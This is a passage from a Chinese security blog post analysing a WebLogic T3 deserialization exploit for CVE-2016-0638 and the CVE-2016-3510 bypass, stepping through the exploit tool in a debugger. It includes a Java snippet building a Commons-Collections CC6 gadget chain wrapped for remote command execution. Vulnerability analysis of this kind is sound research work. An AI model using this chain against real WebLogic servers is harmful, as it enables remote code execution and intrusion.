<h3 id="Exp分析"><a href="#Exp分析" class="headerlink" title="Exp分析"></a>Exp分析</h3><p>项目导入idea后如下设置，之后开启debug模式<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226152229.png"><br>入口类149行处打上断点，开始debug调试分析<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226152353.png"><br>先将我们的参数解析为cmdline，之后再根据解析得到的参数的值对<code>host</code> ，<code>port</code>等变量进行赋值，最后进入<code>executeBlind()</code>方法<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226152555.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226152706.png"><br>从<code>-C</code>参数解析取得要执行的命令，这里要注意一下必须同时存在<code>-B</code>和<code>-C</code>参数才能接着往下执行，我们跟进62行的<code>blindExecute()</code><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226152808.png"><br>对os进行判断，以此决定执行命令的终端，之后在43行处得到反序列化payload，跟进<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226153006.png"><br>先跟进里面的<code>blindExecutePayloadTransformerChain(execArgs)</code>看一眼，发现是链式反应里的<code>Transformers</code>数组设置，接着再回到<code>serialData</code>这里<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226153122.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226153236.png"><br>发现原来是CC1的<code>gadget</code>，很烦，和远程环境8u202对不上，得先自己改成CC6的链子，这里暂停调试一下把CC6的链子贴上去改改，调完之后正式跟进<code>selectBypass()</code><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226153417.png"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);  </span><br><span class="line">HashMap&lt;Object,Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;Object,Object&gt;();  </span><br><span class="line">Map&lt;Object,Object&gt; Lazymap = LazyMap.decorate(map,<span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(<span class="number">1</span>));  </span><br><span class="line"><span class="type">TiedMapEntry</span> <span class="variable">tiedMapEntry</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TiedMapEntry</span>(Lazymap,<span class="string">&quot;aaa&quot;</span>);  </span><br><span class="line">HashMap&lt;Object,Object&gt; map2 = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;Object,Object&gt;();  </span><br><span class="line">map2.put(tiedMapEntry,<span class="string">&quot;bbb&quot;</span>);  </span><br><span class="line">Lazymap.remove(<span class="string">&quot;aaa&quot;</span>);  </span><br><span class="line"><span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> LazyMap.class;  </span><br><span class="line"><span class="type">Field</span> <span class="variable">factoryFied</span> <span class="operator">=</span> c.getDeclaredField(<span class="string">&quot;factory&quot;</span>);  </span><br><span class="line">factoryFied.setAccessible(<span class="literal">true</span>);  </span><br><span class="line">factoryFied.set(Lazymap,chainedTransformer);  </span><br><span class="line"><span class="type">Object</span> <span class="variable">_handler</span> <span class="operator">=</span> BypassPayloadSelector.selectBypass(map2);  </span><br><span class="line"><span class="keyword">return</span> Serializables.serialize(_handler);</span><br></pre></td></tr></table></figure>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226154147.png"><br>因为<code>Main.Type</code>设置的是<code>streamMessageImpl</code>，所以这里跟进的是38行的逻辑<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226154234.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226154345.png"><br>给套了层<code>streamMessageImpl</code>的壳，到此为止payload即生成完毕<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226154505.png"><br>之后就是把payload按T3协议发送过去了，这块就不跟了，和上面的python本质是一样的<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226154615.png"><br>执行结果如下<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226154716.png"></p>
<h2 id="CVE-2016-3510（修复绕过）"><a href="#CVE-2016-3510（修复绕过）" class="headerlink" title="CVE-2016-3510（修复绕过）"></a>CVE-2016-3510（修复绕过）</h2><p>在Weblogic从流量中的序列化类字节段通过readClassDesc-readNonProxyDesc-resolveClass获取到普通类序列化数据的类对象后，程序依次尝试调用类对象中的readObject、readResolve、readExternal等方法</p>
<p>根据上面这段话，这里还有一个几乎是一样原理的bypass，exp分析就不过了，和0638几乎一样，只是改了个<code>Main.Type</code>的事儿，简单看一下漏洞分析就是了，我们来到<code>MarshalledObject#readResolve</code>这块</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226162141.png"></p>
<p>49行一眼二次反序列化，接着看看<code>this.objByte</code>怎么出来的就行了</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226162707.png"></p>
<p>实例化的时候就已经搞定了恶意序列化数据，over</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2024/03/10/RASPDemo/"
      title="从零开始的RASP学习"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        从零开始的RASP学习
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/"
      title="Jackson漏洞分析 (一)"
     >

    <p class="title-text">
      
        Jackson漏洞分析 (一)
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 F4miti0n<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
